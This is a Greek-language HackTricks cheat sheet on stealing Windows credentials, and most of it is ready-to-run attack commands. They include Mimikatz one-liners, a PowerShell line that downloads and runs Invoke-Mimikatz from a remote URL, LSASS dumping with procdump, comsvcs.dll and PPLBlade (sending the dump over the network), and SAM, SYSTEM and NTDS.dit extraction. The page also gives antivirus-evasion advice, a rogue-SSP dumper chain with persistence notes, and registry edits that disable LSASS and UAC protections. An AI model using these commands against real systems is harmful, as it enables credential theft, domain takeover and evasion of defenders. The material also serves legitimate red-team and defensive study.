Κλοπή Windows Credentials
Tip
Μάθετε & εξασκηθείτε στο AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Υποστηρίξτε το HackTricks
- Ελέγξτε τα σχέδια συνδρομής!
- Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.
Credentials Mimikatz
#Elevate Privileges to extract the credentials
privilege::debug #This should give am error if you are Admin, butif it does, check if the SeDebugPrivilege was removed from Admins
token::elevate
#Extract from lsass (memory)
sekurlsa::logonpasswords
#Extract from lsass (service)
lsadump::lsa /inject
#Extract from SAM
lsadump::sam
#One liner
mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "exit"
Βρείτε άλλα πράγματα που μπορεί να κάνει το Mimikatz σε this page.
Invoke-Mimikatz
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -DumpCreds #Dump creds from memory
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "exit"'
Μάθετε για κάποιες πιθανές προστασίες credentials εδώ. Αυτές οι προστασίες θα μπορούσαν να εμποδίσουν το Mimikatz από το να εξάγει κάποια credentials.
Credentials με Meterpreter
Χρησιμοποιήστε το Credentials Plugin που έχω δημιουργήσει για να αναζητήσετε passwords και hashes μέσα στο θύμα.
#Credentials from SAM
post/windows/gather/smart_hashdump
hashdump
#Using kiwi module
load kiwi
creds_all
kiwi_cmd "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam"
#Using Mimikatz module
load mimikatz
mimikatz_command -f "sekurlsa::logonpasswords"
mimikatz_command -f "lsadump::lsa /inject"
mimikatz_command -f "lsadump::sam"
Παράκαμψη AV
Procdump + Mimikatz
Επειδή Procdump from SysInternals είναι ένα νόμιμο εργαλείο της Microsoft, δεν εντοπίζεται από Defender.
Μπορείτε να χρησιμοποιήσετε αυτό το εργαλείο για να dump the lsass process, download the dump και να extract τις credentials locally από το dump.
Μπορείτε επίσης να χρησιμοποιήσετε SharpDump.
#Local
C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
#Remote, mount https://live.sysinternals.com which contains procdump.exe
net use Z: https://live.sysinternals.com
Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
# Get it from webdav
\\live.sysinternals.com\tools\procdump.exe -accepteula -ma lsass.exe lsass.dmp
//Load the dump
mimikatz # sekurlsa::minidump lsass.dmp
//Extract credentials
mimikatz # sekurlsa::logonPasswords
Αυτή η διαδικασία εκτελείται αυτόματα με SprayKatz: ./spraykatz.py -u H4x0r -p L0c4L4dm1n -t 192.168.1.0/24
Σημείωση: Κάποια AV μπορεί να εντοπίσουν ως κακόβουλη τη χρήση του procdump.exe για dump του lsass.exe, αυτό συμβαίνει επειδή εντοπίζουν τη συμβολοσειρά “procdump.exe” και “lsass.exe”. Επομένως είναι πιο διακριτικό να περάσετε ως όρισμα το PID του lsass.exe στο procdump αντί για το όνομα lsass.exe.
Δημιουργία dump του lsass με comsvcs.dll
Ένα DLL με όνομα comsvcs.dll που βρίσκεται στο C:\Windows\System32 είναι υπεύθυνο για το dumping process memory σε περίπτωση κατάρρευσης. Αυτό το DLL περιλαμβάνει μια function με όνομα MiniDumpW, σχεδιασμένη να κληθεί χρησιμοποιώντας το rundll32.exe.
Δεν έχουν σημασία τα πρώτα δύο ορίσματα, αλλά το τρίτο χωρίζεται σε τρία στοιχεία. Το PID της διεργασίας που θα γίνει dump αποτελεί το πρώτο στοιχείο, η τοποθεσία του αρχείου dump το δεύτερο, και το τρίτο στοιχείο πρέπει να είναι αυστηρά η λέξη full. Δεν υπάρχουν εναλλακτικές επιλογές.
Μετά την ανάλυση αυτών των τριών στοιχείων, το DLL δημιουργεί το αρχείο dump και μεταφέρει τη μνήμη της συγκεκριμένης διεργασίας στο αρχείο.
Η χρήση της comsvcs.dll είναι εφικτή για το dump της διεργασίας lsass, αποφεύγοντας έτσι την ανάγκη για ανέβασμα και εκτέλεση του procdump. Αυτή η μέθοδος περιγράφεται λεπτομερώς στο https://en.hackndo.com/remote-lsass-dump-passwords/.
Η παρακάτω εντολή χρησιμοποιείται για την εκτέλεση:
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <lsass pid> lsass.dmp full
Μπορείτε να αυτοματοποιήσετε αυτή τη διαδικασία με lssasy.
Dumping lsass with Task Manager
- Κάντε δεξί κλικ στη γραμμή εργασιών (Task Bar) και επιλέξτε Task Manager
- Κάντε κλικ στο More details
- Αναζητήστε τη διεργασία “Local Security Authority Process” στην καρτέλα Processes
- Κάντε δεξί κλικ στη διεργασία “Local Security Authority Process” και επιλέξτε “Create dump file”.
Dumping lsass with procdump
Procdump είναι ένα ψηφιακά υπογεγραμμένο εκτελέσιμο από τη Microsoft που αποτελεί μέρος της σουίτας sysinternals.
Get-Process -Name LSASS
.\procdump.exe -ma 608 lsass.dmp
Εξαγωγή μνήμης του lsass με PPLBlade
PPLBlade είναι ένα Protected Process Dumper Tool που υποστηρίζει την απόκρυψη των memory dump και τη μεταφορά τους σε απομακρυσμένους σταθμούς εργασίας χωρίς να τα αποθηκεύει στον δίσκο.
Κύριες λειτουργίες:
- Παράκαμψη της προστασίας PPL
- Απόκρυψη των memory dump αρχείων για να αποφευχθεί η ανίχνευση από Defender που βασίζεται σε signatures
- Μεταφόρτωση των memory dump μέσω RAW και SMB upload methods χωρίς να γράφονται στο δίσκο (fileless dump)
PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234
LalsDumper – εξαγωγή LSASS με βάση SSP χωρίς MiniDumpWriteDump
Το Ink Dragon περιλαμβάνει έναν τρίων σταδίων dumper που ονομάζεται LalsDumper και δεν καλεί ποτέ την MiniDumpWriteDump, οπότε τα EDR hooks σε αυτό το API δεν ενεργοποιούνται:
- Stage 1 loader (
lals.exe) – αναζητά στοfdp.dllέναν placeholder που αποτελείται από 32 μικρά γράμματαd, τον αντικαθιστά με την απόλυτη διαδρομή προς τοrtu.txt, αποθηκεύει το τροποποιημένο DLL ωςnfdp.dll, και καλείAddSecurityPackageA("nfdp","fdp"). Αυτό αναγκάζει LSASS να φορτώσει το κακόβουλο DLL ως νέο Security Support Provider (SSP). - Stage 2 inside LSASS – όταν LSASS φορτώνει το
nfdp.dll, το DLL διαβάζει τοrtu.txt, κάνει XOR κάθε byte με0x20, και χαρτογραφεί το αποκωδικοποιημένο blob στη μνήμη πριν μεταβιβάσει την εκτέλεση. - Stage 3 dumper – το χαρτογραφημένο payload επαν-υλοποιεί τη λογική του MiniDump χρησιμοποιώντας direct syscalls που επιλύονται από hashed API names (
seed = 0xCD7815D6; h ^= (ch + ror32(h,8))). Μια αφιερωμένη export με όνομαTomανοίγει%TEMP%\<pid>.ddt, ροήςει ένα συμπιεσμένο dump του LSASS στο αρχείο και κλείνει το handle ώστε να μπορεί να γίνει exfiltration αργότερα.
Operator notes:
- Κρατήστε τα
lals.exe,fdp.dll,nfdp.dllκαιrtu.txtστον ίδιο κατάλογο. Το Stage 1 επανεγγράφει τον hard-coded placeholder με την απόλυτη διαδρομή προς τοrtu.txt, οπότε ο διαχωρισμός τους σπάει την αλυσίδα. - Η εγγραφή γίνεται προσθέτοντας
nfdpστοHKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages. Μπορείτε να ορίσετε αυτή την τιμή χειροκίνητα ώστε το LSASS να ξαναφορτώνει το SSP σε κάθε εκκίνηση. - Τα αρχεία
%TEMP%\*.ddtείναι συμπιεσμένα dumps. Αποσυμπιέστε τα τοπικά και στη συνέχεια δώστε τα στο Mimikatz/Volatility για εξαγωγή διαπιστευτηρίων. - Η εκτέλεση του
lals.exeαπαιτεί admin/SeTcb δικαιώματα ώστε τοAddSecurityPackageAνα πετύχει· μόλις η κλήση επιστρέψει, το LSASS φορτώνει το rogue SSP και εκτελεί το Stage 2. - Η αφαίρεση του DLL από το δίσκο δεν το απομακρύνει από το LSASS. Είτε διαγράψτε την καταχώρηση μητρώου και επανεκκινήστε το LSASS (reboot) είτε αφήστε το για μακροχρόνια persistence.
CrackMapExec
Dump SAM hashes
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam
Dump LSA secrets
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa
Εξαγωγή του NTDS.dit από τον στοχευόμενο DC
cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss
Dump του ιστορικού κωδικών του NTDS.dit από τον target DC
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-history
Εμφάνιση της ιδιότητας pwdLastSet για κάθε λογαριασμό στο NTDS.dit
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-pwdLastSet
Stealing SAM & SYSTEM
Αυτά τα αρχεία πρέπει να βρίσκονται στο C:\windows\system32\config\SAM και C:\windows\system32\config\SYSTEM. Αλλά δεν μπορείτε απλά να τα αντιγράψετε με τον κανονικό τρόπο επειδή είναι προστατευμένα.
From Registry
Ο ευκολότερος τρόπος για να κλέψετε αυτά τα αρχεία είναι να αποκτήσετε ένα αντίγραφο από το registry:
reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\security security
Κατεβάστε αυτά τα αρχεία στο Kali μηχάνημά σας και εξάγετε τα hashes χρησιμοποιώντας:
samdump2 SYSTEM SAM
impacket-secretsdump -sam sam -security security -system system LOCAL
Volume Shadow Copy
Μπορείτε να αντιγράψετε προστατευμένα αρχεία χρησιμοποιώντας αυτή την υπηρεσία. Πρέπει να είστε Διαχειριστής.
Χρήση vssadmin
Το εκτελέσιμο vssadmin είναι διαθέσιμο μόνο σε εκδόσεις Windows Server
vssadmin create shadow /for=C:
#Copy SAM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\system32\config\SAM C:\Extracted\SAM
#Copy SYSTEM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\system32\config\SYSTEM C:\Extracted\SYSTEM
#Copy ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\ntds\ntds.dit C:\Extracted\ntds.dit
# You can also create a symlink to the shadow copy and access it
mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
Αλλά μπορείτε να κάνετε το ίδιο από το Powershell. Αυτό είναι ένα παράδειγμα του πώς να αντιγράψετε το αρχείο SAM (ο σκληρός δίσκος που χρησιμοποιείται είναι “C:” και αποθηκεύεται στο C:\users\Public) αλλά μπορείτε να το χρησιμοποιήσετε για την αντιγραφή οποιουδήποτε προστατευμένου αρχείου:
$service=(Get-Service -name VSS)
if($service.Status -ne "Running"){$notrunning=1;$service.Start()}
$id=(gwmi -list win32_shadowcopy).Create("C:\","ClientAccessible").ShadowID
$volume=(gwmi win32_shadowcopy -filter "ID='$id'")
cmd /c copy "$($volume.DeviceObject)\windows\system32\config\sam" C:\Users\Public
cmd /c copy "$($volume.DeviceObject)\windows\system32\config\system" C:\Users\Public
cmd /c copy "$($volume.DeviceObject)\windows\ntds\ntds.dit" C:\Users\Public
$volume.Delete();if($notrunning -eq 1){$service.Stop()}
Κώδικας από το βιβλίο: https://0xword.com/es/libros/99-hacking-windows-ataques-a-sistemas-y-redes-microsoft.html
Invoke-NinjaCopy
Τέλος, μπορείτε επίσης να χρησιμοποιήσετε το PS script Invoke-NinjaCopy για να δημιουργήσετε ένα αντίγραφο των SAM, SYSTEM και ntds.dit.
Invoke-NinjaCopy.ps1 -Path "C:\Windows\System32\config\sam" -LocalDestination "c:\copy_of_local_sam"
Active Directory Διαπιστευτήρια - NTDS.dit
Το NTDS.dit αρχείο θεωρείται η καρδιά του Active Directory, καθώς περιέχει κρίσιμα δεδομένα για αντικείμενα χρηστών, ομάδες και σε ποιες ομάδες ανήκουν. Εκεί αποθηκεύονται τα password hashes των domain χρηστών. Αυτό το αρχείο είναι μια βάση δεδομένων Extensible Storage Engine (ESE) και βρίσκεται στο %SystemRoom%/NTDS/ntds.dit.
Μέσα σε αυτή τη βάση δεδομένων διατηρούνται τρεις κύριοι πίνακες:
- Data Table: Αυτός ο πίνακας αποθηκεύει πληροφορίες για αντικείμενα όπως χρήστες και ομάδες.
- Link Table: Καταγράφει σχέσεις, όπως η συμμετοχή σε ομάδες.
- SD Table: Εδώ φυλάσσονται οι Security descriptors για κάθε αντικείμενο, διασφαλίζοντας την ασφάλεια και τον έλεγχο πρόσβασης για τα αποθηκευμένα αντικείμενα.
More information about this: http://blogs.chrisse.se/2012/02/11/how-the-active-directory-data-store-really-works-inside-ntds-dit-part-1/
Τα Windows χρησιμοποιούν Ntdsa.dll για να αλληλεπιδράσουν με αυτό το αρχείο και αυτό χρησιμοποιείται από το lsass.exe. Στη συνέχεια, ένα μέρος του αρχείου NTDS.dit μπορεί να βρεθεί μέσα στη μνήμη του lsass (μπορεί να βρείτε τα πιο πρόσφατα προσπελασμένα δεδομένα πιθανότατα λόγω βελτίωσης της απόδοσης με τη χρήση cache).
Αποκρυπτογράφηση των hashes μέσα στο NTDS.dit
Το hash είναι κρυπτογραφημένο 3 φορές:
- Αποκρυπτογραφήστε το Password Encryption Key (PEK) χρησιμοποιώντας το BOOTKEY και RC4.
- Αποκρυπτογραφήστε το hash χρησιμοποιώντας το PEK και RC4.
- Αποκρυπτογραφήστε το hash χρησιμοποιώντας DES.
Το PEK έχει την ίδια τιμή σε κάθε domain controller, αλλά είναι κρυπτογραφημένο μέσα στο αρχείο NTDS.dit χρησιμοποιώντας το BOOTKEY του αρχείου SYSTEM του domain controller (διαφέρει ανάμεσα σε domain controllers). Γι’ αυτό, για να αποκτήσετε τα διαπιστευτήρια από το αρχείο NTDS.dit χρειάζεστε τα αρχεία NTDS.dit και SYSTEM (C:\Windows\System32\config\SYSTEM).
Αντιγραφή NTDS.dit χρησιμοποιώντας Ntdsutil
Διαθέσιμο από το Windows Server 2008.
ntdsutil "ac i ntds" "ifm" "create full c:\copy-ntds" quit quit
Μπορείτε επίσης να χρησιμοποιήσετε την τεχνική volume shadow copy για να αντιγράψετε το αρχείο ntds.dit. Θυμηθείτε ότι θα χρειαστείτε επίσης ένα αντίγραφο του SYSTEM file (πάλι, dump it from the registry or use the volume shadow copy τεχνική).
Εξαγωγή hashes από NTDS.dit
Μόλις αποκτήσετε τα αρχεία NTDS.dit και SYSTEM, μπορείτε να χρησιμοποιήσετε εργαλεία όπως το secretsdump.py για να εξαγάγετε τα hashes:
secretsdump.py LOCAL -ntds ntds.dit -system SYSTEM -outputfile credentials.txt
Μπορείτε επίσης να εξάγετε αυτόματα χρησιμοποιώντας έναν έγκυρο domain admin user:
secretsdump.py -just-dc-ntlm <DOMAIN>/<USER>@<DOMAIN_CONTROLLER>
Για μεγάλα αρχεία NTDS.dit συνιστάται να τα εξάγετε χρησιμοποιώντας gosecretsdump.
Τέλος, μπορείτε επίσης να χρησιμοποιήσετε το metasploit module: post/windows/gather/credentials/domain_hashdump ή mimikatz lsadump::lsa /inject
Εξαγωγή αντικειμένων domain από NTDS.dit σε βάση δεδομένων SQLite
Τα αντικείμενα NTDS μπορούν να εξαχθούν σε μια βάση δεδομένων SQLite με ntdsdotsqlite. Όχι μόνο τα secrets εξάγονται, αλλά και ολόκληρα τα αντικείμενα και τα attributes τους για περαιτέρω εξαγωγή πληροφοριών όταν το ακατέργαστο αρχείο NTDS.dit έχει ήδη ανακτηθεί.
ntdsdotsqlite ntds.dit -o ntds.sqlite --system SYSTEM.hive
Το SYSTEM hive είναι προαιρετικό αλλά επιτρέπει την αποκρυπτογράφηση μυστικών (NT & LM hashes, supplemental credentials όπως cleartext passwords, kerberos ή trust keys, NT & LM password histories). Μαζί με άλλες πληροφορίες, εξάγονται τα ακόλουθα δεδομένα: user και machine accounts με τα hashes τους, UAC flags, timestamps για την τελευταία σύνδεση και αλλαγή κωδικού, accounts description, ονόματα, UPN, SPN, groups και recursive memberships, organizational units tree και membership, trusted domains με trusts type, direction και attributes…
Lazagne
Κατεβάστε το binary από here. Μπορείτε να χρησιμοποιήσετε αυτό το binary για να εξαγάγετε credentials από διάφορα software.
lazagne.exe all
Άλλα εργαλεία για την εξαγωγή credentials από το SAM και το LSASS
Windows credentials Editor (WCE)
Αυτό το εργαλείο μπορεί να χρησιμοποιηθεί για την εξαγωγή credentials από τη μνήμη. Κατεβάστε το από: http://www.ampliasecurity.com/research/windows-credentials-editor/
fgdump
Εξάγει credentials από το αρχείο SAM
You can find this binary inside Kali, just do: locate fgdump.exe
fgdump.exe
PwDump
Εξαγωγή διαπιστευτηρίων από το αρχείο SAM
You can find this binary inside Kali, just do: locate pwdump.exe
PwDump.exe -o outpwdump -x 127.0.0.1
type outpwdump
PwDump7
Κατεβάστε το από: http://www.tarasco.org/security/pwdump_7 και απλά εκτελέστε το και οι κωδικοί θα εξαχθούν.
Mining idle RDP sessions and weakening security controls
Το FinalDraft RAT του Ink Dragon περιλαμβάνει έναν tasker DumpRDPHistory του οποίου οι τεχνικές είναι χρήσιμες για κάθε red-teamer:
DumpRDPHistory-style telemetry collection
- Outbound RDP targets – αναλύστε κάθε user hive στο
HKU\<SID>\SOFTWARE\Microsoft\Terminal Server Client\Servers\*. Κάθε υποκλειδί αποθηκεύει το όνομα του server,UsernameHint, και το χρονικό σήμα τελευταίας εγγραφής. Μπορείτε να αναπαράγετε τη λογική του FinalDraft με PowerShell:
Get-ChildItem HKU:\ | Where-Object { $_.Name -match "S-1-5-21" } | ForEach-Object {
Get-ChildItem "${_.Name}\SOFTWARE\Microsoft\Terminal Server Client\Servers" -ErrorAction SilentlyContinue |
ForEach-Object {
$server = Split-Path $_.Name -Leaf
$user = (Get-ItemProperty $_.Name).UsernameHint
"OUT:$server:$user:$((Get-Item $_.Name).LastWriteTime)"
}
}
- Inbound RDP evidence – ερευνήστε το
Microsoft-Windows-TerminalServices-LocalSessionManager/Operationallog για Event IDs 21 (επιτυχής σύνδεση) και 25 (αποσύνδεση) για να χαρτογραφήσετε ποιος διαχειρίστηκε το μηχάνημα:
Get-WinEvent -LogName "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" \
| Where-Object { $_.Id -in 21,25 } \
| Select-Object TimeCreated,@{n='User';e={$_.Properties[1].Value}},@{n='IP';e={$_.Properties[2].Value}}
Μόλις μάθετε ποιος Domain Admin συνδέεται τακτικά, dump το LSASS (με LalsDumper/Mimikatz) όσο η αποσυνδεδεμένη συνεδρία του/της εξακολουθεί να υπάρχει. Το CredSSP + NTLM fallback αφήνει τον verifier και τα tokens τους στο LSASS, τα οποία μπορούν στη συνέχεια να αναπαραχθούν μέσω SMB/WinRM για να αποκτήσετε το NTDS.dit ή να εγκαταστήσετε persistence σε domain controllers.
Registry downgrades targeted by FinalDraft
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 1 /f
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v DSRMAdminLogonBehavior /t REG_DWORD /d 2 /f
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL /t REG_DWORD /d 0 /f
- Η ρύθμιση
DisableRestrictedAdmin=1αναγκάζει την πλήρη επαναχρησιμοποίηση credentials/tickets κατά τη χρήση RDP, επιτρέποντας pivoting τύπου pass-the-hash. LocalAccountTokenFilterPolicy=1απενεργοποιεί το UAC token filtering, ώστε οι local admins να λαμβάνουν μη περιορισμένα tokens μέσω του δικτύου.DSRMAdminLogonBehavior=2επιτρέπει στον DSRM administrator να συνδεθεί ενώ ο DC είναι online, δίνοντας στους επιτιθέμενους έναν ακόμη ενσωματωμένο λογαριασμό με υψηλά προνόμια.RunAsPPL=0αφαιρεί τις LSASS PPL protections, κάνοντας την πρόσβαση στη μνήμη απλή για dumpers όπως το LalsDumper.
Αναφορές
Tip
Μάθετε & εξασκηθείτε στο AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Υποστηρίξτε το HackTricks
- Ελέγξτε τα σχέδια συνδρομής!
- Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.


